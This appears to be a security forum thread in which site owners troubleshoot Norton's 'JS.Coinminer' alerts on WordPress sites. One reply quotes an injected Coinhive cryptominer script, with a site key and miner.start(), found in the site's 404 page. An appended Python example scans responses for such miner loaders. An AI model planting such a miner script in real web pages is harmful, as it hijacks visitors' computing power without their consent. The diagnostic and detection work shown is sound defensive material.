Advanced Threat Protection

  • 1.  JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Nov 15, 2017 10:58 PM

    Norton Security blocks me from browsing (Chrome) of my websites which it says is infected with “JS.Coinminer Download 6” and “JS.Coinminer Download 8” (images of alerts below FYI).

    I have used Sourcetree (Bitbucket) to clone the WordPress folder of this website and run a scan of Norton Security on this folder. The Norton Security scan initially took over 12 hours and was still running in the morning. After contacting Norton Support they restarted DNS and finally ran another scan of the Git folder which said it was clean…which was a little weird considering it should have shown some sort of infection…

    Now I'm suspecting Norton Security is giving a “false” positive based on its signature of the JSCoinminer threat (which I think includes redirects). I have yet to confirm this but have lodged a second level issue with Norton as first level was unable to give me any more details (after 2 hours and three support remote sessions…).

    Does anyone know why this JSCoinminer Download 6 and 8 might be flagging my website? Any help appreciated.



  • 2.  RE: JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Nov 16, 2017 06:22 AM

    What file is it flagging?

    Also for Norton products, they have a community here:

    https://us.norton.com/community

    Symantec is specific to enterprise products.



  • 3.  RE: JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Nov 17, 2017 01:05 AM

    Hi Brian, thx. 

    It's apparently flagging a couple of files in a non-existent directory according to my developers...

    My Norton Security product doesn't tell me there is an infection anymore when I try to view it with Chrome, but it does say there is a threat warning when I use Mozilla Firefox! WTF?

    Norton Websafe webpage indicates the infection is there but located in the USA (where our previous web host server was located) but we have moved it to Australia last week so this info may be old.... https://safeweb.norton.com/report/show?url=https%3A%2F%2Fwww.urbanmarketing.com.au and shows the files are as follows:

     
    Threat Name:
    Location:
    http://www.urbanmarketing.com.au/case/images/quicksilver_front.jpg
     
     
    Threat Name:
    Location:
    http://urbanmarketing.com.au/case/images/quicksilver_front.jpg


  • 4.  RE: JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Nov 20, 2017 12:12 AM

    I have the exact same problem. Norton is flagging a WordPress site I manage saying that it is blocking an attack from "JS Coinminer Download 6". This only started about a week ago (give or take). My site has 2 sections, one built using WordPress and another section is not. Norton only flags when I visit the WordPress section of my site.

    I am using Chrome, . 

    My WordPress site has an ongoing malware scan; it has reported no infection. I have also asked the hosting company to do a manual scan twice already, still no infection found.

    Very annoying not to know if this is indeed a false negative from Norton.

    I submitted a report to Norton asking them to verify if this is a false negative, haven't heard any update yet.

    I am attaching a screen shot of the pop up that flags JScoinminer being blocked.

     



  • 5.  RE: JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Jan 12, 2018 06:36 PM

    Excellent post! Very interesting topic. :)



  • 6.  RE: JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Jan 15, 2018 07:47 AM

    PUA.Jscoinminer is on a lot of websites and a lot more on WordPress. The file scans are only scanning your area, not the entire server. It is the cloud; anything can happen.



  • 7.  RE: JSCoinminer Download 6 and Download 8 preventing viewing of website

    Posted Mar 18, 2018 10:42 AM

    I accessed your website through one of the URLs mentioned;

    http://www.urbanmarketing.com.au/case/images/quicksilver_front.jpg

    and although I got 404 - not found for this file, the web content for the error page DID contain some suspicious file. When looking into this file there were several indications that this was indeed suspect:

    It _was_ JS (JavaScript) and _did_ contain references to "coinhive.com".

    It looks like you're infected.

    Here's a code snippet (from your web page/site):

    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
    var miner = new CoinHive.User('OYVj9VafS1hMApLflmS9CmX0pkxg9wKN', 'urbanmarketing.com.au');
    miner.start();
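
The thread's last finding is that the miner loader sat in the HTML body of the 404 error page, which a browser still parses and runs. The following is an added example, not code from the thread or from any poster: a check over served response bodies that records the status code but never uses it to skip a body. The names `MinerScriptFinder`, `scan_responses` and `SAMPLE` are hypothetical, and the sample responses, `example.com` and the site key are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

MINER_HOST = "coinhive.com"  # host quoted in the thread
# CoinHive.User is the call quoted in the thread; Anonymous is the library's other common entry point.
MINER_CALL = re.compile(r"new\s+CoinHive\.(User|Anonymous)\s*\(\s*['\"]([^'\"]+)")

class MinerScriptFinder(HTMLParser):
    """Collects miner loader tags and inline miner start-up calls."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if host == MINER_HOST or host.endswith("." + MINER_HOST):
                self.findings.append(("external-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # only match inside <script>, not in visible page text
            for kind, key in MINER_CALL.findall(data):
                self.findings.append(("inline-miner-call", f"CoinHive.{kind} key={key}"))

def scan_responses(responses):
    """responses: (url, status, body) tuples. Status is recorded, never used to skip a body."""
    report = {}
    for url, status, body in responses:
        finder = MinerScriptFinder()
        finder.feed(body)
        finder.close()
        if finder.findings:
            report[url] = (status, finder.findings)
    return report

# Constructed sample responses (example.com and the key are placeholders).
SAMPLE = [
    ("https://www.example.com/", 200, "<h1>Home</h1><script src='/js/site.js'></script>"),
    ("https://www.example.com/case/images/missing.jpg", 404,
     "<h1>Not found</h1><script src='https://coinhive.com/lib/coinhive.min.js'></script>"
     "<script>var miner = new CoinHive.User('EXAMPLE_SITE_KEY', 'example.com');"
     " miner.start();</script>"),
]
```

Feeding it bodies fetched for paths that do not exist, alongside normal pages, covers error templates and any other markup that is generated at request time rather than stored as a file in the site folder.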